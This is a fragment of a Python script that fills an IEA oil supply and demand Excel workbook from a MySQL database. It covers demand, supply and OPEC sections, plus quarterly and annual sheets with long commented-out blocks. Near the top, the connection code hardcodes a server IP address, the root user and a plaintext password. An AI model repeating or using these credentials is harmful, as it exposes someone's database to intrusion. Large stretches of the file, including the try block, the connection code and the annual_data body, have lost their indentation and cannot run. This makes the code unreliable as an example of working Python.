                        match_fetch['Total OPEC'] = total_opec_supply
                        tot_opec = tot_opec + 1
                        break
        elif sheet[row_ex].value == 'Stocks':
            row = row + 1
            row_ex = 'A' + str(row)
            if sheet[row_ex].value == 'Government Controlled':
                stock_govt = row
                print('stock_gov',stock_govt)
                for sto_oecd in range(stock_govt,max_row):
                    row_ex = 'A' + str(sto_oecd)
                    if sheet[row_ex].value == 'OECD':
                        oecd_stock = sto_oecd+1
                        fetch['oecd_stock'] = oecd_stock
                        break
            elif sheet[row_ex].value == 'Industry Stocks':
                idstock = row
                row = row + 1
                for ioecd in range(row, max_row):
                    row_ex = 'A' + str(ioecd)
                    if sheet[row_ex].value == 'OECD':
                        ioecd_stock = ioecd+1
                        fetch['ioecd_stock'] = ioecd_stock
                        print('ioecd_stock', ioecd_stock)
                    if (sheet[row_ex].value == 'CHANGE - MBD'):
                        mbd = ioecd
                        print('CHANGE - MBD', row_ex)
                        break
        #important condition to limit the row
        if (mbd == row):
            break
    return fetch,match_fetch
#
# #
# #
# #Database Connection
try:
connection = mysql.connector.connect(host='13.229.23.103',
database='Aletheia',
user='root',
password='AP@2019capio!')
if connection.is_connected():
db_Info = connection.get_server_info()
print("Connected to MySQL database... MySQL Server version on ", db_Info)
cursor = connection.cursor(buffered=True)
cursor.execute("select database();")
record = cursor.fetchone()
print("Your connected to - ", record)
def callproc_script():
    """Run the DP_IEAReportDataPopulation stored procedure and echo the
    first row of every result set it produces.

    Uses the module-level `cursor`; DB failures are printed, not raised.
    """
    try:
        cursor.callproc('DP_IEAReportDataPopulation')
        for result_set in cursor.stored_results():
            print(result_set.fetchone())
    except Error as e:
        print("print", e)
# #dynamically access Regions and Countries
def regions(sheet):
    """Write the row labels (Demand/Supply groups, regions, countries, OPEC
    section) into column A of the named worksheet, driven by DISTINCT
    queries against TotalSummaryReport / ReportFor2b / ReportFor3.

    NOTE(review): `flag`, `nonoced` and the leaked loop variable `row` form a
    small state machine carrying the current write position between the two
    group loops; several cells are written and then immediately overwritten
    at the same `row` (e.g. the 'Total...' labels) — verify intended layout
    against the workbook.  Uses module-level `wb` and `cursor`.
    """
    print(sheet)
    # wb.create_sheet(sheet)
    sheet = wb.get_sheet_by_name(sheet)
    max_col = (sheet.max_column)
    max_row = (sheet.max_row) + 1
    print(max_col) #
    # # print(max_row)
    flag = 1
    nonoced = 0
    # font = Font(name='Calibri',size = 11,bold = True)
    gr_demand = ['OECD', 'Non-OECD']
    gr_supply = ['Non-OPEC-OECD', 'Non-OPEC-Non-OECD']
    try:
        for groups in gr_demand:
            if flag == 1:
                # First group: locate the 'Demand' header and start below it.
                rows = 10
                sheet.cell(row=9, column=1).value = 'Demand'
                for row in range(rows, max_row):
                    row_ex = 'A' + str(row)
                    if sheet[row_ex].value == 'Demand':
                        row = row + 1
                        sheet.cell(row=row, column=1).value = groups
                        sheet.cell(row=row, column=1).font = Font(bold=True)
                        rows = row + 1
                        break
            elif flag == 2:
                # Second group: resume at the position saved by the first pass.
                rows = nonoced
                sheet.cell(row=rows, column=1).value = groups
                sheet.cell(row=rows, column=1).font = Font(bold=True)
                rows = rows + 1
            else:
                pass
            cursor.execute(
                "SELECT distinct RegionName FROM TotalSummaryReport WHERE ElementType = 'Demand' and Groups = %s",
                (groups,))
            result = cursor.fetchall()
            row = row + 1
            for value in result:
                row = row + 1
                # print(row)
                val = value[0]
                sheet.cell(row=row, column=1).value = val
                sheet.cell(row=row, column=1).alignment = Alignment(horizontal='left', indent=1, wrap_text=True)
                sheet.cell(row=row, column=1).font = Font(bold=True)
                cursor.execute(
                    "select distinct Country from ReportFor2b where RegionName = %s and Gropus = %s", (val,groups,))
                result_country = cursor.fetchall()
                for value in result_country:
                    row = row + 1
                    print(value[0])
                    sheet.cell(row=row, column=1).value = value[0]
                    sheet.cell(row=row, column=1).alignment = Alignment(horizontal='left', indent=2, wrap_text=True)
                    sheet.cell(row=row, column=1).font = Font(bold=False)
            sheet.cell(row=row, column=1).value = 'Total' + groups
            sheet.cell(row=row, column=1).font = Font(bold=True)
            sheet.cell(row=row, column=1).alignment = Alignment(horizontal='left', indent=0, wrap_text=True)
            nonoced = row + 1
            flag = 2
            print(row)
        row = row + 1
        sheet.cell(row=row, column=1).value = ' '
        row = row + 1
        sheet.cell(row=row, column=1).value = 'Supply'
        sheet.cell(row=row, column=1).alignment = Alignment(horizontal='left', indent=0, wrap_text=True)
        sheet.cell(row=row, column=1).font = Font(bold=True)
        flag = 1
        for groups in gr_supply:
            if flag == 1:
                rows = row
                for row in range(rows, max_row):
                    row_ex = 'A' + str(row)
                    if sheet[row_ex].value == 'Supply':
                        row = row + 1
                        sheet.cell(row=row, column=1).value = groups
                        sheet.cell(row=row, column=1).alignment = Alignment(horizontal='left', indent=0,
                                                                            wrap_text=True)
                        sheet.cell(row=row, column=1).font = Font(bold=True)
                        rows = row + 1
                        break
            elif flag == 2:
                rows = nonoced
                sheet.cell(row=rows, column=1).value = groups
                sheet.cell(row=row, column=1).alignment = Alignment(horizontal='left', indent=0, wrap_text=True)
                sheet.cell(row=row, column=1).font = Font(bold=True)
            else:
                pass
            cursor.execute(
                "SELECT distinct RegionName FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = %s",
                (groups,))
            result = cursor.fetchall()
            for value in result:
                row = row + 1
                # print(row)
                val = value[0]
                sheet.cell(row=row, column=1).value = val
                sheet.cell(row=row, column=1).alignment = Alignment(horizontal='left', indent=1, wrap_text=True)
                sheet.cell(row=row, column=1).font = Font(bold=True)
                cursor.execute(
                    "select distinct Country from ReportFor3 where RegionName = %s and Groups = %s ", (val,groups,))
                result_country = cursor.fetchall()
                for value in result_country:
                    row = row + 1
                    print(value[0])
                    sheet.cell(row=row, column=1).value = value[0]
                    sheet.cell(row=row, column=1).font = Font(bold=False)
                    sheet.cell(row=row, column=1).alignment = Alignment(horizontal='left', indent=2, wrap_text=True)
            sheet.cell(row=row, column=1).value = 'Total' + groups.replace('Non-OPEC-', '')
            sheet.cell(row=row, column=1).font = Font(bold=True)
            nonoced = row
            flag = 2
            print(row)
        # Fixed trailing rows after the supply groups.
        row = row + 1
        sheet.cell(row=row, column=1).value = 'Processing gains'
        row = row + 1
        sheet.cell(row=row, column=1).value = 'Global Biofuels'
        row = row + 1
        sheet.cell(row=row, column=1).value = 'Total Non-OPEC Supply'
        sheet.cell(row=row, column=1).font = Font(bold=True)
        row = row + 1
        sheet.cell(row=row, column=1).value = 'Non-OPEC: Historical Composition'
        sheet.cell(row=row, column=1).font = Font(bold=True)
        row = row + 1
        sheet.cell(row=row, column=1).value = ''
        row = row + 1
        sheet.cell(row=row, column=1).value = 'OPEC'
        sheet.cell(row=row, column=1).font = Font(bold=True)
        sheet.cell(row=row, column=1).alignment = Alignment(horizontal='left', indent=0, wrap_text=True)
        if sheet.cell(row=row, column=1).value == 'OPEC':
            print("OPECCCCCCCCCCCCCCCC")
            cursor.execute(
                "SELECT distinct Country FROM ReportFor3 WHERE ElementType = 'Supply' and Groups = 'OPEC'")
            result = cursor.fetchall()
            for value in result:
                print(value[0])
                row = row + 1
                sheet.cell(row=row, column=1).value = value[0]
                sheet.cell(row=row, column=1).alignment = Alignment(horizontal='left', indent=2, wrap_text=True)
        sheet.cell(row=row, column=1).value = 'Crude'
        sheet.cell(row=row, column=1).alignment = Alignment(horizontal='left', indent=1, wrap_text=True)
        row = row + 1
        sheet.cell(row=row, column=1).value = 'NGL'
        row = row + 1
        sheet.cell(row=row, column=1).value = 'Total OPEC'
        row = row + 1
        sheet.cell(row=row, column=1).font = Font(bold=True)
        sheet.cell(row=row, column=1).value = 'OPEC: Historical Composition'
        sheet.cell(row=row, column=1).font = Font(bold=True)
        row = row + 1
        sheet.cell(row=row, column=1).value = 'Total Supply'
        sheet.cell(row=row, column=1).font = Font(bold=True)
        row = row + 1
    except Error as e:
        print("print", e)
wb.save('./IEA QUARTERLY FILE_WITH MODEL_PW_Country.xlsx')
def quarter_data():
    """Populate quarterly Non-OPEC-Non-OECD supply figures in the 'Quarter' sheet.

    Reads row bookmarks from ``fetch_excel('Quarter')`` (expects the keys
    ``'nonoecd_supply'`` and ``'totalnonoecd_supply'``), then walks the period
    header row (row 1) column by column up to the sentinel period '2025-1Q':

    * a row whose column-A label matches a region name is filled from
      ``TotalSummaryReport``;
    * a row whose label is not a known region falls back to a per-country
      lookup in ``ReportFor3``;
    * the 'Total Non-OECD' row is filled from the group total and ends the
      row scan for that column.

    The workbook is saved at the end; any database ``Error`` is caught and
    printed.  Relies on the module-level ``wb``, ``cursor``, ``fetch_excel``,
    ``Alignment`` and ``Error`` names.
    """
    fetch = fetch_excel('Quarter')
    # fetch_excel returns a sequence; the first item is the bookmark dict.
    fetch = fetch[0]
    # NOTE(review): get_sheet_by_name is deprecated in openpyxl 2.x and removed
    # in 3.0; wb['Quarter'] is the modern spelling.  Kept for consistency with
    # the rest of this file.
    sheet = wb.get_sheet_by_name('Quarter')
    max_col = sheet.max_column
    print(max_col)
    try:
        # NOTE(review): range(2, max_col) never visits the last column --
        # confirm this is intentional (the '2025-1Q' sentinel below may make
        # the last column unreachable anyway).
        for col in range(2, max_col):
            period = sheet.cell(row=1, column=col).value
            print(period)
            if period == '2025-1Q':
                # Sentinel period: nothing at or beyond this column is filled.
                break
            # Row window of the Non-OECD supply section (+1 so the
            # 'Total Non-OECD' row itself is included in the range).
            totalnonoecd_supply = int(fetch.get('totalnonoecd_supply')) + 1
            nonoecd_supply = int(fetch.get('nonoecd_supply'))
            for non in range(nonoecd_supply, totalnonoecd_supply):
                row_ex = 'A' + str(non)
                label = sheet[row_ex].value
                currentCell = sheet.cell(row=non, column=1)
                if label == 'Total Non-OECD':
                    currentCell.alignment = Alignment(horizontal='left', indent=0,
                                                      vertical='bottom',
                                                      wrap_text=True)
                    cursor.execute(
                        "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-Non-OECD' and Period = %s and Regionname IS NULL",
                        (period,))
                    result = cursor.fetchone()
                    if result is None:
                        sheet.cell(row=non, column=col).value = ''
                    else:
                        for val in result:
                            sheet.cell(row=non, column=col).value = val
                    # The total row closes the section for this column.
                    break
                else:
                    # Try the label as a region name first.
                    cursor.execute(
                        "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-Non-OECD' and Regionname = %s and Period = %s",
                        (label, period,))
                    result = cursor.fetchone()
                    if result is None:
                        # Not a region: fall back to the per-country report.
                        currentCell.alignment = Alignment(horizontal='left', indent=2,
                                                          vertical='bottom',
                                                          wrap_text=True)
                        cursor.execute(
                            "SELECT Value FROM ReportFor3 WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-Non-OECD' and Period = %s and Country = %s",
                            (period, label))
                        result = cursor.fetchall()
                        print(result)
                        if result:
                            sheet.cell(row=non, column=col).value = result[0][0]
                    else:
                        for val in result:
                            sheet.cell(row=non, column=col).value = val
                        currentCell.alignment = Alignment(horizontal='left', indent=1, wrap_text=True)
        wb.save('./IEA QUARTERLY FILE_WITH MODEL_PW_Country.xlsx')
    except Error as e:
        print("print", e)
# # # # #
## Insert annual data from the database tables
def annual_data():
# try:
# sheet = wb.get_sheet_by_name('Annual_Previous')
# wb.remove_sheet(sheet)
# sheet = wb.get_sheet_by_name('Annual')
# ws2 = wb.copy_worksheet(sheet)
# ws2.title = 'Annual_Previous'
# wb.remove_sheet(sheet)
# except Exception as e:
# sheet = wb.get_sheet_by_name('Annual')
# ws2 = wb.copy_worksheet(sheet)
# ws2.title = 'Annual_Previous'
# wb.remove_sheet(sheet)
# region = regions('Annual')
fetch = fetch_excel("Annual_Previous")
sheet = wb.get_sheet_by_name('Annual_Previous')
max_col = (sheet.max_column)
print(max_col)
fetch = fetch[0]
print(fetch)#
# # # print(max_row)
try:
# # sheet['A12'].alignment = Alignment(horizontal="left")
# for col in range(2, max_col):
# period = sheet.cell(row=1, column=col).value
# print(period)
# if (period == '2025-Y'):
# break
# totaloecd_demand = int(fetch.get('totaloecd_demand')) + 1
# oecd_demand = int(fetch.get('oecd_demand'))
# for row in range(oecd_demand, totaloecd_demand):
# row_ex = 'A' + str(row)
# if (period == '2025-Y'):
# flag = 1
# break
# else:
# if sheet[row_ex].value == 'Total OECD':
# # print("total oecds")
# currentCell = sheet.cell(row=row, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Demand' and Groups = 'OECD' and Period = %s and RegionName IS NULL and ReportedDate <= '2019-01-18 00:00:00'",
# (period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=row, column=col).value = val
# else:
# if ('Y' in period):
# for val in result:
# sheet.cell(row=row, column=col).value = val
# else:
# region = sheet[row_ex].value
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Demand' and Groups = 'OECD' and Period = %s and Regionname = %s and ReportedDate <= '2019-01-18 00:00:00'",
# (period, region,))
# result = cursor.fetchall()
# if result and len(result) >0:
# val = result[0][0]
# print(val)
# if ('Y' in period):
# sheet.cell(row=row, column=col).value = val
# currentCell = sheet.cell(row=row, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=1, vertical='bottom',
# wrap_text=True)
#
# else:
# country = sheet[row_ex].value
# cursor.execute(
# "SELECT value FROM ReportFor2b WHERE ElementType = 'Demand' and Groups = 'OECD' and Period = %s and Country = %s and ReportedDate <= '2019-01-18 00:00:00'",
# (period, country,))
# result = cursor.fetchall()
# if result and len(result) > 0:
# val = result[0][0]
# if ('Y' in period):
# sheet.cell(row=row, column=col).value = val
# currentCell = sheet.cell(row=row, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=2,
# vertical='bottom',
# wrap_text=True)
#
# else:
# pass
# # # # # #
# # # # # # #
# for col in range(2, max_col):
# period = sheet.cell(row=1, column=col).value
# print(period)
# if (period == '2025-Y'):
# break
# # #for demand and nonoecd #
# totalnonoecd_demand = int(fetch.get('totalnonoecd_demand')) + 2
# #for total demand
# nonoecd_demand = int(fetch.get('nonoecd_demand'))
# for non in range(nonoecd_demand, totalnonoecd_demand):
# row_ex = 'A' + str(non)
# if sheet[row_ex].value == 'Total Non-OECD':
# currentCell = sheet.cell(row=non, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# # #print("total non oecds")
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Demand' and Groups = 'Non-OECD' and Period = %s and RegionName IS NULL ",
# (period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=non, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=non, column=col).value = val
# else:
# row_ex = 'A' + str(non)
# region = sheet[row_ex].value
# cursor.execute(
# "SELECT Value FROM TotalSummaryReport WHERE ElementType = 'Demand' and Groups = 'Non-OECD' and Period = %s and RegionName = %s ",
# (period, region,))
# result = cursor.fetchone()
# if result is None:
# country = sheet[row_ex].value
# cursor.execute(
# "SELECT value FROM ReportFor2b WHERE ElementType = 'Demand' and Groups = 'Non-OECD' and Period = %s and Country = %s",
# (period, country,))
# result = cursor.fetchall()
# if result and len(result) > 0:
# val = result[0][0]
# if ('Y' in period):
# sheet.cell(row=non, column=col).value = val
# currentCell = sheet.cell(row=non, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=2,
# vertical='bottom',
# wrap_text=True)
#
# else:
# pass
# else:
# for val in result:
# sheet.cell(row=non, column=col).value = val
# currentCell = sheet.cell(row=non, column=1)
# currentCell.alignment = Alignment(horizontal='left', indent=1,
# vertical='bottom',
# wrap_text=True)
# if sheet[row_ex].value == 'Total Demand':
# currentCell = sheet.cell(row=non, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Demand' and Groups IS NULL and Period = %s and RegionName IS NULL ",
# (period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=non, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=non, column=col).value = val
# break
# # # # #
# for col in range(2, max_col):
# period = sheet.cell(row=1, column=col).value
# print(period)
# if (period == '2025-Y'):
# break
# totaloecd_supply = int(fetch.get('totaloecd_supply')) +1
# oecd_supply = int(fetch.get('oecd_supply'))
# for row in range(oecd_supply, totaloecd_supply):
# row_ex = 'A' + str(row)
# if sheet[row_ex].value == 'Total OECD':
# # print("total supply oecds")
# currentCell = sheet.cell(row=row, column=1)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-OECD' and Period = %s and RegionName IS NULL ",
# (period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=row, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=row, column=col).value = val
#
# break
# else:
# row_ex = 'A' + str(row)
# region = sheet[row_ex].value
# currentCell = sheet.cell(row=row, column=1)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-OECD' and Regionname = %s and Period = %s ",
# (region,period,))
# result = cursor.fetchone()
# if result is None:
# country = sheet[row_ex].value
# currentCell = sheet.cell(row=row, column=1)
# currentCell.alignment = Alignment(horizontal='left', indent=2,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT Value FROM ReportFor3 WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-OECD' and Period = %s and Country = %s ",
# (period, country,))
# result = cursor.fetchall()
# if result and len(result) > 0:
# val = result[0][0]
# sheet.cell(row=row, column=col).value = val
#
# else:
# country = sheet[row_ex].value ##for uk
# currentCell.alignment = Alignment(horizontal='left', indent=2,
# vertical='bottom', wrap_text=True)
# cursor.execute(
# "SELECT Value FROM Report3 WHERE ElementType = 'Supply' and Period = %s and Country = %s ",
# (period, country,))
# result = cursor.fetchall()
# if result and len(result) > 0:
# val = result[0][0]
# sheet.cell(row=row, column=col).value = val
#
# else:
# pass
# else:
# for val in result:
# sheet.cell(row=row, column=col).value = val
# currentCell.alignment = Alignment(horizontal='left', indent=1, wrap_text=True)
# print(val, period)
# # # # # # # #
for col in range(2, max_col):
period = sheet.cell(row=1, column=col).value
print(period)
if (period == '2025-Y'):
break # for supply non-oecd
totalnonoecd_supply = int(fetch.get('totalnonoecd_supply')) + 1
nonoecd_supply = int(fetch.get('nonoecd_supply'))
for non in range(nonoecd_supply, totalnonoecd_supply):
row_ex = 'A' + str(non)
if sheet[row_ex].value == 'Total Non-OECD':
currentCell = sheet.cell(row=non, column=1)
# print(row)
currentCell.alignment = Alignment(horizontal='left', indent=0,
vertical='bottom',
wrap_text=True)
cursor.execute(
"SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-Non-OECD' and Period = %s and RegionName IS NULL ",
(period,))
result = cursor.fetchone()
if result is None:
val = ''
sheet.cell(row=non, column=col).value = val
else:
for val in result:
sheet.cell(row=non, column=col).value = val
break
else:
row_ex = 'A' + str(non)
region = sheet[row_ex].value
currentCell = sheet.cell(row=non, column=1)
cursor.execute(
"SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-Non-OECD' and Regionname = %s and Period = %s ",
(region,period,))
result = cursor.fetchone()
if result is None:
country = sheet[row_ex].value
currentCell.alignment = Alignment(horizontal='left', indent=2,vertical='bottom',wrap_text=True)
cursor.execute(
"SELECT Value FROM ReportFor3 WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-Non-OECD' and Period = %s and Country = %s ",
(period, country,))
result = cursor.fetchall()
if result and len(result) > 0:
val = result[0][0]
sheet.cell(row=non, column=col).value = val
else:
pass
else:
for val in result:
sheet.cell(row=non,column=col).value = val
currentCell.alignment = Alignment(horizontal='left', indent=1, wrap_text=True)
# # # # # # # # # # #
# for col in range(2, max_col):
# period = sheet.cell(row=1, column=col).value
# print(period)
# if (period == '2025-Y'):
# break
# # for supply nonopec
# total_non_opec_supply = int(fetch.get('total_non_opec_supply'))
# totalnonoecd_supply = int(fetch.get('totalnonoecd_supply')) + 1
# nonoecd_supply = int(fetch.get('nonoecd_supply'))
# for non in range(nonoecd_supply, totalnonoecd_supply):
# row_ex = 'A' + str(non)
# if sheet[row_ex].value == 'Total Non-OECD':
# currentCell = sheet.cell(row=non, column=1)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-Non-OECD' and Period = %s and RegionName IS NULL and ReportedDate like '2019-02-13%'",
# (period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=non, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=non, column=col).value = val
# break
# else:
# row_ex = 'A' + str(non)
# region = sheet[row_ex].value
# currentCell = sheet.cell(row=non, column=1)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-Non-OECD' and Regionname = %s and Period = %s and ReportedDate like '2019-02-13%'",
# (region,period,))
# result = cursor.fetchone()
# if result is None:
# country = sheet[row_ex].value
# currentCell.alignment = Alignment(horizontal='left', indent=2,vertical='bottom',wrap_text=True)
# cursor.execute(
# "SELECT Value FROM ReportFor3 WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-Non-OECD' and Period = %s and Country = %s and ReportedDate like '2019-02-13%'",
# (period, country,))
# result = cursor.fetchall()
# if result and len(result) > 0:
# val = result[0][0]
# sheet.cell(row=non, column=col).value = val
#
# else:
# pass
# else:
# for val in result:
# print(val)
# sheet.cell(row=non,column=col).value = val
# currentCell.alignment = Alignment(horizontal='left', indent=1, wrap_text=True)
# print(total_non_opec_supply)
# totalnonoecd_supply = int(fetch.get('totalnonoecd_supply'))
# print(totalnonoecd_supply)
# for col in range(2, max_col):
# period = sheet.cell(row=1, column=col).value
# print(period)
# if (period == '2025-Y'):
# break
# for nonopec in range(totalnonoecd_supply, total_non_opec_supply):
# row_ex = 'A' + str(nonopec) #
# if (period == '2025-Y'):
# break
# progain = sheet[row_ex].value
# print(progain)
# if sheet[row_ex].value == 'Processing gains':
# print("Processing gainsProcessing gains")
# currentCell = sheet.cell(row=nonopec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = %s and Period = %s and ReportedDate like '2019-02-13%'",
# (progain,period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=nonopec, column=col).value = val
#
# else:
# for val in result:
# sheet.cell(row=nonopec, column=col).value = val
#
# elif sheet[row_ex].value == 'Global Biofuels':
# currentCell = sheet.cell(row=nonopec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# gobal_f=sheet[row_ex].value
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = %s and Period = %s and ReportedDate like '2019-02-13%'",
# (gobal_f, period,))
# result = cursor.fetchone()
# #print(result)
# if result is None:
# val = ''
# sheet.cell(row=nonopec, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=nonopec, column=col).value = val
# elif sheet[row_ex].value == 'Total Non-OPEC Supply':
# currentCell = sheet.cell(row=nonopec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'Non-OPEC' and Period = %s and ReportedDate like '2019-02-13%'",
# ( period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=nonopec, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=nonopec, column=col).value = val
# elif sheet[row_ex].value == 'Non-OPEC: Historical Composition':
# currentCell = sheet.cell(row=nonopec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM IEA_HistoricMacroElementsData WHERE ElementType = 'S' and TableType = '1' and GroupID1 = '4' and GroupID2 = '7' and PeriodID = %s and ReportedDate like '2019-02-13%'",
# ( period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=nonopec, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=nonopec, column=col).value = val
# # # #
# # # # # #
# for col in range(2, max_col):
# period = sheet.cell(row=1, column=col).value
# print(period)
# if (period == '2025-Y'):
# break# #
# # # # # #for opec supply
# total_opec_supply=int(fetch.get('total_opec_supply'))+10
# opec_supply = int(fetch.get('opec_supply'))
# for opec in range(opec_supply, total_opec_supply):
# row_ex = 'A' + str(opec)
# if (period == '2025-Y'):
# break
# crude = sheet[row_ex].value
# if crude == 'Crude':
# currentCell = sheet.cell(row=opec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = %s and Period = %s ",
# (crude, period,))
# result = cursor.fetchone()
# #print(result)
# if result is None:
# val = ''
# sheet.cell(row=opec, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=opec, column=col).value = val
# elif sheet[row_ex].value == 'NGL':
# currentCell = sheet.cell(row=opec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# ngl = sheet[row_ex].value
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = %s and Period = %s ",
# (ngl, period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=opec, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=opec, column=col).value = val
# elif sheet[row_ex].value == 'Total OPEC':
# currentCell = sheet.cell(row=opec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'OPEC' and RegionName IS NULL and Period = %s",
# ( period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=opec, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=opec, column=col).value = val
# elif sheet[row_ex].value == 'OPEC: Historical Composition':
# currentCell = sheet.cell(row=opec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM IEA_HistoricMacroElementsData WHERE ElementType = 'S' and TableType = '1' and GroupID1 = '3' and GroupID2 = '7' and PeriodID = %s",
# ( period,))
# result = cursor.fetchone()
# print("historical OPEC",result)
# if result is None:
# val = ''
# sheet.cell(row=opec, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=opec, column=col).value = val
# elif sheet[row_ex].value == 'Total Supply':
# currentCell = sheet.cell(row=opec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups IS NULL and Period = %s",
# (period,))
# result = cursor.fetchone()
#
# if result is None:
# val = ''
# sheet.cell(row=opec, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=opec, column=col).value = val
# else:
# row_ex = 'A' + str(opec)
# region = sheet[row_ex].value
# currentCell = sheet.cell(row=opec, column=1)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'OPEC' and Regionname = %s and Period = %s",
# (region,period,))
# result = cursor.fetchone()
# if result is None:
# country = sheet[row_ex].value
# currentCell.alignment = Alignment(horizontal='left', indent=2, vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT Value FROM ReportFor3 WHERE ElementType = 'Supply' and Groups = 'OPEC' and Period = %s and Country = %s",
# (period, country,))
# result = cursor.fetchall()
# if result and len(result) > 0:
# val = result[0][0]
# sheet.cell(row=opec, column=col).value = val
#
# else:
# pass
# else:
# for val in result:
# sheet.cell(row=opec, column=col).value = val
# currentCell.alignment = Alignment(horizontal='left', indent=1, wrap_text=True)
wb.save('./IEA QUARTERLY FILE_WITH MODEL_PW_Country.xlsx')
except Error as e:
print("print", e)
#
#
# def delta(wb): #### to find difference between values of two sheets
# print(wb.get_sheet_names())
# # sheet = wb.get_sheet_by_name('Delta_annual')
# # wb.remove_sheet(sheet)
# # sheet = wb.get_sheet_by_name('Delta_Quarter')
# # wb.remove_sheet(sheet)
# try:
# if 'Delta_annual' in wb.sheetnames:
# print('sheet1 exists')
# else:
# sheet = wb.get_sheet_by_name('Annual')
# ws2 = wb.copy_worksheet(sheet)
# ws2.title = 'Delta_annual'
# max_col = (ws2.max_column)
# print(max_col)
# max_row = (ws2.max_row)
# print(max_row)
# sheet_copy = wb.get_sheet_by_name('Annual_Previous')
# # sheet_copy.cell(row=11, column=2).value = '45'
# for col in range(2, max_col):
# period = ws2.cell(row=1, column=col).value
# if (period == '2025-Y'):
# break
# for row in range(11, 112):
# value1 = sheet.cell(row=row, column=col).value
# value2 = sheet_copy.cell(row=row, column=col).value
# print(value1, value2)
# if value1 == None or value2 == None:
# pass
# else:
# try:
# val = int(value1) - int(value2)
# ws2.cell(row=row, column=col).value = val
# except ValueError:
# pass
